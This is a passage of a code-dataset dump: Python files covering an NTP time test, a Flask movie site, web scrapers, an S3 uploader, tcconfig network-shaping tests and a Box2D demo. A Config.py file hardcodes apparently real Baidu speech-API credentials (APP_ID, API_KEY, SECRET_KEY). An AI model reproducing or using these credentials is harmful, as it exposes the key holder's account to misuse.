"usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 445, "usage_type": "name"}]} +{"seq_id": "622746602", "text": "def test():\n \"\"\"Return current UTC time as tuple.\n \"\"\"\n from network import WLAN, STA_IF\n import machine\n import ntptime\n import ujson as json\n\n try:\n print('Connect to WiFi')\n content = open('config.json').read()\n cfg = json.loads(content)\n except OSError:\n print('Error: Could not load configuration')\n\n rtc = machine.RTC()\n before_ntp = rtc.datetime()\n print('Current Datetime: {}'.format(before_ntp))\n\n sta = WLAN(STA_IF)\n sta.active(True)\n\n nets = sta.scan()\n for net in nets:\n ssid = net[0].decode('UTF-8')\n if ssid == cfg['ssid']:\n sta.connect(ssid, cfg['password'])\n while not sta.isconnected():\n machine.idle()\n break\n break\n else:\n print('Error: Network not found')\n\n print('Connect to NTP Server')\n retry = 0\n while (retry != 5):\n try:\n ntptime.settime()\n break\n except OSError as exc:\n if exc.args[0] == errno.ETIMEDOUT:\n retry += 1\n machine.idle()\n else:\n raise RuntimeError('Could not set ntptime')\n\n rtc = machine.RTC()\n after_ntp = rtc.datetime()\n print('Current Datetime: {}'.format(after_ntp))\n\nif __name__ == \"__main__\":\n test()", "sub_path": "tests/test_time_ntp.py", "file_name": "test_time_ntp.py", "file_ext": "py", "file_size_in_byte": 1316, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "ujson.loads", "line_number": 12, "usage_type": "call"}, {"api_name": "machine.RTC", "line_number": 16, "usage_type": "call"}, {"api_name": "network.WLAN", "line_number": 20, "usage_type": "call"}, {"api_name": "network.STA_IF", "line_number": 20, "usage_type": "argument"}, {"api_name": "machine.idle", "line_number": 29, "usage_type": "call"}, {"api_name": "ntptime.settime", "line_number": 39, "usage_type": "call"}, {"api_name": "machine.idle", "line_number": 44, "usage_type": "call"}, {"api_name": "machine.RTC", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "584817824", "text": "from flask import Flask,render_template,request,url_for,redirect\nfrom flask_nav import Nav,register_renderer\nfrom flask_bootstrap.nav import BootstrapRenderer\nfrom flask_nav.elements import *\nfrom flask_bootstrap import Bootstrap\nfrom flask_frozen import Freezer\nimport database\n\n\nlFtrCols = [\"title\",\"year\", \"runtimes\",\"genres\", 'color_info', 'director', 'cast_1st',\n 'cast_2nd', 'cast_3rd', 'countries', 'languages', 'writer',\n 'editor', 'cinematographer', 'art_director', 'costume_designer',\n 'original_music', 'sound_mix', 'production_companies']\n\ninfo_name={'title':'Title','genres':'Genres','color_info':'Color','director':'Director','cast_1st':'1st Actor(Actress)','cast_2nd':'2nd Actor(Actress)','cast_3rd':'3rd Actor(Actress)','countries':'Country','languages':'Language',\n'writer':'Writer','editor':'Editor','cinematographer':'Cinematographer','art_director':'Art Direction','costume_designer':'Costume Designer','original_music':'Original music by','sound_mix':'Sound Mix',\n'production_companies':'Production Company','cheby':'Chebyshev','clark':'Clark','cbra':'Canberra','k-l':'Kullback-Leibler','cos':'Cosine','intsc':'Intersection'}\n\nindices=['cheby','clark','cbra','k-l','cos','intsc']\n\n\nclass CustomRenderer(BootstrapRenderer):\n def visit_Navbar(self, node):\n nav_tag = super(CustomRenderer, self).visit_Navbar(node)\n nav_tag['class'] += ' navbar-fixed-top'\n return nav_tag\n\nnav=Nav()\n\nnav.register_element('top', Navbar(\n # Link('Tech Support', href='http://techsupport.invalid/widgits_inc')\n # ,\n \"Movie Rating Project\",\n View('Index', 'preview')\n))\n\napp = Flask(__name__)\napp.config['FREEZER_RELATIVE_URLS'] = True\nregister_renderer(app, 'custom', CustomRenderer)\n\nnav.init_app(app)\n\nBootstrap(app)\n\nfreezer = Freezer(app)\n\n\n@freezer.register_generator\ndef details():\n for m in database.select_movie():\n yield {'movieid': m[0].encode('utf-8')}\n\n# @app.route('/')\n# def home():\n# movies=database.select_movie()\n# return render_template('index_layout.html',movies=movies)\n # return redirect(url_for('preview'))\n\n@app.route('/preview/')\ndef preview():\n movies=database.select_movie()\n return render_template('index_layout.html',movies=movies)\n\n@app.route('/details//')\ndef details(movieid):\n movie=database.get_instance_details(movieid)\n return render_template('details_layout.html',info_cols=lFtrCols,movie=movie,name=info_name,metrics=indices)\n\n\nif __name__ == '__main__':\n freezer.freeze()\n # freezer.run(debug=True)\n \t# \tapp.run()", "sub_path": "website/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 2578, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask_bootstrap.nav.BootstrapRenderer", "line_number": 22, "usage_type": "name"}, {"api_name": "flask_nav.Nav", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 37, "usage_type": "call"}, {"api_name": "flask_nav.register_renderer", "line_number": 39, "usage_type": "call"}, {"api_name": "flask_bootstrap.Bootstrap", "line_number": 43, "usage_type": "call"}, {"api_name": "flask_frozen.Freezer", "line_number": 45, "usage_type": "call"}, {"api_name": "database.select_movie", "line_number": 50, "usage_type": "call"}, {"api_name": "database.select_movie", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 62, "usage_type": "call"}, {"api_name": "database.get_instance_details", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "307943242", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Zhangcl\nimport logging\nimport time\nfrom logging import handlers\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nfh = handlers.TimedRotatingFileHandler(filename='timelog.log',when='S',interval=2,backupCount=4)\nfh.setLevel(logging.INFO)\nformatter=logging.Formatter('%(asctime)s - %(name)s - %(filename)s %(levelname)s : %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\nlogger.addHandler(ch)\nlogger.addHandler(fh)\nlogger.info('this is info')\nlogger.warning('this is warning')\ntime.sleep(2)\nlogger.error('this is error')\nlogger.info('this is info2')\ntime.sleep(2)\nlogger.warning('this is warning2')", "sub_path": "day6/logtest.py", "file_name": "logtest.py", "file_ext": "py", "file_size_in_byte": 745, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.handlers.TimedRotatingFileHandler", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 11, "usage_type": "name"}, {"api_name": "logging.INFO", "line_number": 12, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 13, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "103374616", "text": "import os\nimport glob\nimport requests\nimport json\nfrom core.storages import BaseStorageClient\nfrom core.automan_client import AutomanClient\n\n\nclass S3StorageClient(BaseStorageClient):\n\n def __init__(self, storage_config):\n super(S3StorageClient, self).__init__(storage_config)\n os.mkdir('/s3')\n self.rosbag_path = '/s3/rosbag.bag'\n self.extract_path = storage_config['output_dir']\n self.target_url = storage_config['target_url']\n self.storage_id = storage_config['storage_id']\n\n def download(self, url=None):\n if url is None:\n url = self.target_url\n req = requests.get(url, stream=True)\n if req.status_code == 200:\n with open(self.rosbag_path, 'wb') as f:\n f.write(req.content)\n else:\n print('status_code = ' + str(req.status_code))\n\n def upload(self, automan_info):\n jpg = glob.glob(self.extract_path+'*.jpg')\n pcd = glob.glob(self.extract_path+'*.pcd')\n for filepath in jpg + pcd:\n name = os.path.split(filepath)[1]\n data = {\n 'storage_id': str(self.storage_id),\n 'key': self.extract_path + name}\n res = AutomanClient.send_result(\n automan_info, data, automan_info['presigned']).text\n presigned = json.loads(res)\n headers = {'content-type': 'application/octet-stream'}\n res = requests.put(\n presigned['url'],\n headers=headers,\n data=open(filepath, 'rb')\n )\n if res.status_code != 204:\n print('status_code=' + str(res.status_code) + ': ' + res.text)\n\n def list(self):\n pass\n\n def get_input_path(self):\n return self.rosbag_path\n\n def get_output_dir(self):\n return self.extract_path\n", "sub_path": "libs/core/storages/s3_storage_client.py", "file_name": "s3_storage_client.py", "file_ext": "py", "file_size_in_byte": 1885, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "core.storages.BaseStorageClient", "line_number": 9, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 30, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "core.automan_client.AutomanClient.send_result", "line_number": 37, "usage_type": "call"}, {"api_name": "core.automan_client.AutomanClient", "line_number": 37, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.put", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "517957445", "text": "from selenium import webdriver\nfrom bs4 import BeautifulSoup\n\nimport numpy as np\nimport pandas as pd\nimport re\nimport time\n\nclass HKJCRaceResult:\n \"\"\" Load a HKJC race result webpage and extract informations\n 1. Race tab\n 2. Performance\n 3. Result\n \"\"\"\n def __init__(self, browser_path):\n \"\"\" initiate a browser\n\n Parameters: browser_path (str) - the browser_path, recommend to use firefox\n \"\"\"\n self.browser = webdriver.Firefox(executable_path=browser_path)\n\n def load_race_source(self, year, month, day, race_num, quit_session=False):\n \"\"\" load the specific race result\n\n Parameters: year (str) - year\n month (str) - month\n day (str) - day\n race_num (str) - the race number\n quit_session (boo) - quit this session or not, optional, default is False\n \"\"\"\n url = 'https://racing.hkjc.com/racing/information/English/Racing/LocalResults.aspx?RaceDate={}/{}/{}&RaceNo={}'.format(year, month, day, race_num)\n\n self.browser.get(url)\n\n counter = 0\n while True:\n counter += 1\n time.sleep(5)\n self.soup = BeautifulSoup(self.browser.page_source, 'html.parser')\n check_if_load = self.soup.find_all('div', class_='localResults commContent')\n\n if check_if_load:\n break\n elif counter == 5:\n print('Failed to load expected page source')\n break\n else:\n continue\n\n if quit_session:\n self.close_browser()\n\n def extract_race_tab(self):\n \"\"\" extract race tab\n \"\"\"\n # race tab\n race_tab = self.soup.find_all('div', class_='race_tab')[0]\n rt_table = race_tab.find_all('table')[0].find_all('td')\n rt_info = [i.text for i in rt_table if i.text != '']\n\n return rt_info\n\n def extract_race_performance(self):\n \"\"\" extract race performance\n \"\"\"\n # performance\n performance = self.soup.find_all('div', class_='performance')[0]\n # table header\n p_table_header = [i.text for i in performance.find_all('thead')[0].find_all('td')]\n # table content\n p_table = performance.find_all('table')[0].find_all('tbody')[0].find_all('td')\n # reshape dimension\n p_table_arr = np.array([re.sub(r'\\s+', ' ', i.text) for i in p_table]).reshape((-1,len(p_table_header)))\n performance_info = pd.DataFrame(p_table_arr, columns=p_table_header)\n\n return performance_info\n\n def extract_race_result(self):\n \"\"\" extract race result\n \"\"\"\n # result\n result = self.soup.find_all('div', class_='dividend_tab f_clear')[0].find_all('table')[0]\n # table header\n result_header = [i.text for i in result.find_all('thead')[0].find_all('tr', class_='bg_e6caae')[0].find_all('td')]\n # table content\n result_tr = result.find_all('tbody')[0].find_all('tr')\n # process table content\n max_td = np.max([len(i.find_all('td')) for i in result_tr])\n all_tr = list()\n\n # pad length not max\n for j in result_tr:\n sec_len = len(j.find_all('td'))\n if sec_len < max_td:\n this_sec = [all_tr[-1][0]]*(max_td-sec_len) + [i.text for i in j.find_all('td')]\n else:\n this_sec = [i.text for i in j.find_all('td')]\n all_tr.append(this_sec)\n\n result_info = pd.DataFrame(all_tr, columns=result_header)\n\n return result_info\n\n def close_browser(self):\n \"\"\" close the current session\n \"\"\"\n self.browser.close()\n", "sub_path": "ETL/coolorange/scraper.py", "file_name": "scraper.py", "file_ext": "py", "file_size_in_byte": 3703, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "selenium.webdriver.Firefox", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 20, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 38, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 88, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "208169557", "text": "\nfrom pymongo import MongoClient\nfrom aip import AipSpeech\n\nMC = MongoClient(\"127.0.0.1\", 27017)\nMongoDB = MC[\"Teresa\"]\nCOVER_PATH = 'Cover'\nMUSIC_PATH = 'Music'\nCHAT_PATH = 'Chat'\nQR_PATH = 'QR code'\nLT_URL = \"http://qr.liantu.com/api.php?text=\"\n\nAPP_ID = '16981699'\nAPI_KEY = '36Lnn4w8Yov91xN1B0RXzk8Y'\nSECRET_KEY = 'fVqFeNIUKSLO6STTCqeHip8DYMtBvtPz'\nAUDIO_CLIENT = AipSpeech(APP_ID, API_KEY, SECRET_KEY)\nVOICE = {'vol': 5}\n\nRET = {\n 'CODE': 0,\n 'MSG': '',\n 'DATA': {}\n}", "sub_path": "玩具项目/人工智能03/Bronya/Config.py", "file_name": "Config.py", "file_ext": "py", "file_size_in_byte": 481, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymongo.MongoClient", "line_number": 5, "usage_type": "call"}, {"api_name": "aip.AipSpeech", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "6855791", "text": "from selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\ndriver = webdriver.Chrome(\"C:/Users/Lenovo/Downloads/chromedriver_win32/chromedriver\")\r\nproducts=[]\r\nprices=[]\r\ndriver.get(\"https://www.goibibo.com/hotels/find-hotels-in-Hubli/4175146706007535451/4175146706007535451/%7B%22ci%22:%2220200407%22,%22co%22:%2220200408%22,%22r%22:%221-2-0%22%7D/?{%22filter%22:{}}&sec=dom\")\r\ncontent = driver.page_source\r\nsoup = BeautifulSoup(content)\r\nfor a in soup.findAll('div', attrs={'class':'Layouts__Column-sc-1yzlivq-1 HotelCardstyles__HeadingInfoWrapperDiv-sc-1s80tyk-8 kRLydM'}):\r\n name=a.find('div', attrs={'class':'HotelCardstyles__HotelNameWrapperDiv-sc-1s80tyk-13 jbBSpQ'})\r\n #price=a.find('div', attrs={'class':'latoBlack font26 blackText appendBottom5'})\r\n products.append(name.text)\r\n #prices.append(price.text)\r\nfor a in soup.findAll('div', attrs={'class':'HotelCardstyles__PriceInfoWrapperDiv-sc-1s80tyk-28 hONQHN'}):\r\n #name=a.find('div', attrs={'class':'latoBlack font22 blackText appendBottom12'})\r\n price=a.find('span', attrs={'class':'HotelCardstyles__CurrentPrice-sc-1s80tyk-32 cPOgJy'})\r\n #products.append(name.text)\r\n prices.append(price.text)\r\ndf = pd.DataFrame({'Hotel Name':products,'Price':prices}) \r\ndf.to_csv('Hotels.csv', index=False, encoding='utf-8')", "sub_path": "web.py", "file_name": "web.py", "file_ext": "py", "file_size_in_byte": 1322, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 4, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 4, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 9, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "396933970", "text": "# encoding: utf-8\n\n'''\n@author: Tsuyoshi Hombashi\n'''\n\nimport itertools\nimport platform\n\nimport dataproperty\nimport pingparsing\nimport pytest\nimport six\nimport thutils\nimport tcconfig\n\n\nDEVICE = \"eth0\"\nWAIT_TIME = 5 # [sec]\n\n\n@pytest.fixture\ndef dst_host_option(request):\n return request.config.getoption(\"--dst-host\")\n\n\n@pytest.fixture\ndef dst_host_ex_option(request):\n return request.config.getoption(\"--dst-host-ex\")\n\n\n@pytest.fixture\ndef subproc_wrapper():\n return thutils.subprocwrapper.SubprocessWrapper()\n\n\n@pytest.fixture\ndef pingparser():\n return pingparsing.PingParsing()\n\n\n@pytest.fixture\ndef transmitter():\n transmitter = pingparsing.PingTransmitter()\n transmitter.ping_option = \"-f -q\"\n transmitter.waittime = WAIT_TIME\n\n return transmitter\n\n\nclass NormalTestValue:\n RATE_LIST = [\n \"\",\n \"--rate 100K\",\n \"--rate 0.5M\",\n ]\n DELAY_LIST = [\n \"\",\n \"--delay 100\",\n ]\n DELAY_DISTRO_LIST = [\n \"\",\n \"--delay-distro 20\",\n ]\n PACKET_LOSS_RATE_LIST = [\n \"\",\n \"--loss 0.1\",\n ]\n CORRUPTION_RATE_LIST = [\n \"\",\n \"--corrupt 0.1\",\n ]\n DIRECTION_LIST = [\n \"\",\n \"--direction outgoing\",\n \"--direction incoming\",\n ]\n NETWORK_LIST = [\n \"\",\n \"--network 192.168.0.10\",\n \"--network 192.168.0.0/24\",\n ]\n PORT_LIST = [\n \"\",\n \"--port 80\",\n ]\n OVERWRITE_LIST = [\n \"\",\n \"--overwrite\",\n ]\n\n\nclass Test_tcconfig:\n \"\"\"\n Tests of in this class are inappropriate for Travis CI.\n Execute following command at the local environment when running tests:\n python setup.py test --addopts --runxfail\n\n These tests are expected to execute on following environment:\n - Linux(debian) w/ iputils-ping package\n - English environment (for parsing ping output)\n \"\"\"\n\n @pytest.mark.xfail\n @pytest.mark.parametrize(\n [\n \"rate\", \"delay\", \"delay_distro\", \"loss\", \"corrupt\",\n \"direction\", \"network\", \"port\", \"overwrite\",\n ],\n [\n opt_list\n for opt_list in itertools.product(\n NormalTestValue.RATE_LIST,\n NormalTestValue.DELAY_LIST,\n NormalTestValue.DELAY_DISTRO_LIST,\n NormalTestValue.PACKET_LOSS_RATE_LIST,\n NormalTestValue.CORRUPTION_RATE_LIST,\n NormalTestValue.DIRECTION_LIST,\n NormalTestValue.NETWORK_LIST,\n NormalTestValue.PORT_LIST,\n NormalTestValue.OVERWRITE_LIST)\n ])\n def test_smoke(\n self, subproc_wrapper, rate, delay, delay_distro, loss, corrupt,\n direction, network, port, overwrite):\n command = \" \".join([\n \"tcset\",\n \"--device \" + DEVICE,\n rate, delay, delay_distro, loss,\n direction, network, port, overwrite,\n ])\n assert subproc_wrapper.run(command) == 0\n\n assert subproc_wrapper.run(\"tcdel --device \" + DEVICE) == 0\n\n @pytest.mark.xfail\n @pytest.mark.parametrize([\"overwrite\", \"expected\"], [\n [\"\", 0],\n [\"--overwrite\", 255],\n ])\n def test_config_file(self, tmpdir, subproc_wrapper, overwrite, expected):\n p = tmpdir.join(\"tcconfig.json\")\n config = \"\"\"{\n \"eth0\": {\n \"outgoing\": {\n \"network=192.168.0.10/32, port=8080\": {\n \"delay\": \"10.0\", \n \"loss\": \"0.01\", \n \"rate\": \"250K\", \n \"delay-distro\": \"2.0\"\n }, \n \"network=0.0.0.0/0\": {}\n }, \n \"incoming\": {\n \"network=192.168.10.0/24\": {\n \"corrupt\": \"0.02\", \n \"rate\": \"1500K\"\n }, \n \"network=0.0.0.0/0\": {}\n }\n }\n}\n\"\"\"\n p.write(config)\n\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n command = \" \".join([\"tcset -f \", str(p), overwrite])\n assert subproc_wrapper.run(command) == expected\n\n proc = subproc_wrapper.popen_command(\"tcshow --device \" + DEVICE)\n tcshow_stdout, _stderr = proc.communicate()\n assert thutils.loader.JsonLoader.loads(\n tcshow_stdout) == thutils.loader.JsonLoader.loads(config)\n\n assert subproc_wrapper.run(\"tcdel --device \" + DEVICE) == 0\n\n\nclass Test_tcset_one_network:\n \"\"\"\n Tests of in this class are inappropriate for Travis CI.\n Execute following command at the local environment when running tests:\n python setup.py test --addopts \"--dst-host=\"\n\n These tests are expected to execute on following environment:\n - Linux(debian) w/ iputils-ping package\n - English environment (for parsing ping output)\n \"\"\"\n\n @pytest.mark.parametrize([\"delay\"], [\n [100],\n ])\n def test_const_latency(\n self, dst_host_option, subproc_wrapper,\n transmitter, pingparser, delay):\n if dataproperty.is_empty_string(dst_host_option):\n # alternative to pytest.mark.skipif\n return\n\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n transmitter.destination_host = dst_host_option\n\n # w/o latency tc ---\n result = transmitter.ping()\n pingparser.parse(result)\n without_tc_rtt_avg = pingparser.rtt_avg\n\n # w/ latency tc ---\n command_list = [\n \"tcset\",\n \"--device \" + DEVICE,\n \"--delay %d\" % (delay),\n ]\n assert subproc_wrapper.run(\" \".join(command_list)) == 0\n\n result = transmitter.ping()\n pingparser.parse(result)\n with_tc_rtt_avg = pingparser.rtt_avg\n\n # assertion ---\n rtt_diff = with_tc_rtt_avg - without_tc_rtt_avg\n assert rtt_diff > (delay / 2.0)\n\n # finalize ---\n assert subproc_wrapper.run(\"tcdel --device \" + DEVICE) == 0\n\n @pytest.mark.skipif(\"platform.system() == 'Windows'\")\n @pytest.mark.parametrize([\"delay\", \"delay_distro\"], [\n [100, 50],\n ])\n def test_const_latency_distro(\n self, dst_host_option, subproc_wrapper,\n transmitter, pingparser, delay, delay_distro):\n if dataproperty.is_empty_string(dst_host_option):\n # alternative to pytest.mark.skipif\n return\n\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n transmitter.destination_host = dst_host_option\n\n # w/o latency tc ---\n result = transmitter.ping()\n pingparser.parse(result)\n without_tc_rtt_avg = pingparser.rtt_avg\n without_tc_rtt_mdev = pingparser.rtt_mdev\n\n # w/ latency tc ---\n command_list = [\n \"tcset\",\n \"--device \" + DEVICE,\n \"--delay %d\" % (delay),\n \"--delay-distro %d\" % (delay_distro),\n ]\n assert subproc_wrapper.run(\" \".join(command_list)) == 0\n\n result = transmitter.ping()\n pingparser.parse(result)\n with_tc_rtt_avg = pingparser.rtt_avg\n with_tc_rtt_mdev = pingparser.rtt_mdev\n\n # assertion ---\n rtt_diff = with_tc_rtt_avg - without_tc_rtt_avg\n assert rtt_diff > (delay / 2.0)\n\n rtt_diff = with_tc_rtt_mdev - without_tc_rtt_mdev\n assert rtt_diff > (delay_distro / 2.0)\n\n # finalize ---\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n\n @pytest.mark.parametrize([\"option\", \"value\"], [\n [\"--loss\", 10],\n [\"--corrupt\", 10],\n ])\n def test_const_packet_loss(\n self, dst_host_option, subproc_wrapper,\n transmitter, pingparser, option, value):\n if dataproperty.is_empty_string(dst_host_option):\n # alternative to pytest.mark.skipif\n return\n\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n transmitter.destination_host = dst_host_option\n\n # w/o packet loss tc ---\n result = transmitter.ping()\n pingparser.parse(result)\n without_tc_loss = (\n pingparser.packet_receive / float(pingparser.packet_transmit)) * 100.0\n\n # w/ packet loss tc ---\n command_list = [\n \"tcset\",\n \"--device \" + DEVICE,\n \"%s %f\" % (option, value),\n ]\n assert subproc_wrapper.run(\" \".join(command_list)) == 0\n\n result = transmitter.ping()\n pingparser.parse(result)\n with_tc_loss = (\n pingparser.packet_receive / float(pingparser.packet_transmit)) * 100.0\n\n # assertion ---\n loss_diff = without_tc_loss - with_tc_loss\n assert loss_diff > (value / 2.0)\n\n # finalize ---\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n\n\nclass Test_tcset_two_network:\n \"\"\"\n Tests of in this class are inappropriate for Travis CI.\n Execute following command at the local environment when running tests:\n python setup.py test --addopts \\\n \"--dst-host= --dst-host-ex=\"\n\n These tests are expected to execute on following environment:\n - Linux(debian) w/ iputils-ping package\n - English environment (for parsing ping output)\n \"\"\"\n\n def test_network(\n self, dst_host_option, dst_host_ex_option, subproc_wrapper,\n transmitter, pingparser):\n if any([\n dataproperty.is_empty_string(dst_host_option),\n dataproperty.is_empty_string(dst_host_ex_option),\n ]):\n # alternative to pytest.mark.skipif\n return\n\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n delay = 100\n\n # tc to specific network ---\n command_list = [\n \"tcset\",\n \"--device \" + DEVICE,\n \"--delay %d\" % (delay),\n \"--network \" + dst_host_ex_option,\n ]\n assert subproc_wrapper.run(\" \".join(command_list)) == 0\n\n # w/o tc network ---\n transmitter.destination_host = dst_host_option\n result = transmitter.ping()\n pingparser.parse(result)\n without_tc_rtt_avg = pingparser.rtt_avg\n\n # w/ tc network ---\n transmitter.destination_host = dst_host_ex_option\n result = transmitter.ping()\n pingparser.parse(result)\n with_tc_rtt_avg = pingparser.rtt_avg\n\n # assertion ---\n rtt_diff = with_tc_rtt_avg - without_tc_rtt_avg\n assert rtt_diff > (delay / 2.0)\n\n # finalize ---\n subproc_wrapper.run(\"tcdel --device \" + DEVICE)\n", "sub_path": "test/test_tcconfig.py", "file_name": "test_tcconfig.py", "file_ext": "py", "file_size_in_byte": 10436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytest.fixture", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 27, "usage_type": "attribute"}, {"api_name": "thutils.subprocwrapper.SubprocessWrapper", "line_number": 34, "usage_type": "call"}, {"api_name": "thutils.subprocwrapper", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pingparsing.PingParsing", "line_number": 39, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pingparsing.PingTransmitter", "line_number": 44, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 105, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 105, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 112, "usage_type": "call"}, {"api_name": "thutils.loader.JsonLoader.loads", "line_number": 172, "usage_type": "call"}, {"api_name": "thutils.loader", "line_number": 172, "usage_type": "attribute"}, {"api_name": "thutils.loader.JsonLoader.loads", "line_number": 173, "usage_type": "call"}, {"api_name": "thutils.loader", "line_number": 173, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 136, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 137, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 137, "usage_type": "attribute"}, {"api_name": "dataproperty.is_empty_string", "line_number": 195, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 189, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 189, "usage_type": "attribute"}, {"api_name": "dataproperty.is_empty_string", "line_number": 233, "usage_type": "call"}, {"api_name": "pytest.mark.skipif", "line_number": 226, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 226, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 227, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 227, "usage_type": "attribute"}, {"api_name": "dataproperty.is_empty_string", "line_number": 277, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 270, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 270, "usage_type": "attribute"}, {"api_name": "dataproperty.is_empty_string", "line_number": 327, "usage_type": "call"}, {"api_name": "dataproperty.is_empty_string", "line_number": 328, "usage_type": "call"}]} +{"seq_id": "13130822", "text": "# -*- coding: utf-8 -*-\n\nfrom pug2d import core, actions, box2d\nfrom pug2d.box2d import Box2DLevel, Updater, can_see\nfrom Box2D import b2\nimport sf\n\n\nbox2d.PPM = 20\n\nclass Level1(Box2DLevel):\n def __init__(self, world):\n super(Level1, self).__init__(world)\n layer = core.Layer()\n self.add_layer(layer)\n \n self.ground = world.CreateStaticBody(\n position=(0, -2),\n shapes=b2.polygonShape(box=(50, 5))\n )\n \n self.im0 = sf.Texture.load_from_file(b'princess.png')\n for x in range(100, 800, 300):\n sprite = sf.Sprite(self.im0)\n sprite.origin = (self.im0.width//2, self.im0.height//2)\n sprite.position = (x, 300)\n actor = core.Actor(sprite)\n body = world.CreateDynamicBody()\n body.CreateCircleFixture(radius=2.5, density=1.0, friction=0.3)\n actor.add_action(Updater(body), name='box2d')\n layer.add_actor(actor)\n actors = self.layers[0].actors\n actors[1].obstacle = True\n actors[0].add_action(actions.DefferedCall(1.0, self.test_los))\n \n def test_los(self, actor):\n max_dist = 800.0/box2d.PPM\n actor2 = self.layers[0].actors[2]\n print(can_see(actor, actor2, max_dist, 45.0))\n self.layers[0].actors[1].obstacle = False\n print(can_see(actor, actor2, max_dist, 45.0))\n\n\ngame = core.Game(800, 600)\nlevel = Level1(b2.world(gravity=(0, 0)))\ngame.run(level)\n", "sub_path": "examples/box2d_los.py", "file_name": "box2d_los.py", "file_ext": "py", "file_size_in_byte": 1584, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pug2d.box2d.PPM", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pug2d.box2d", "line_number": 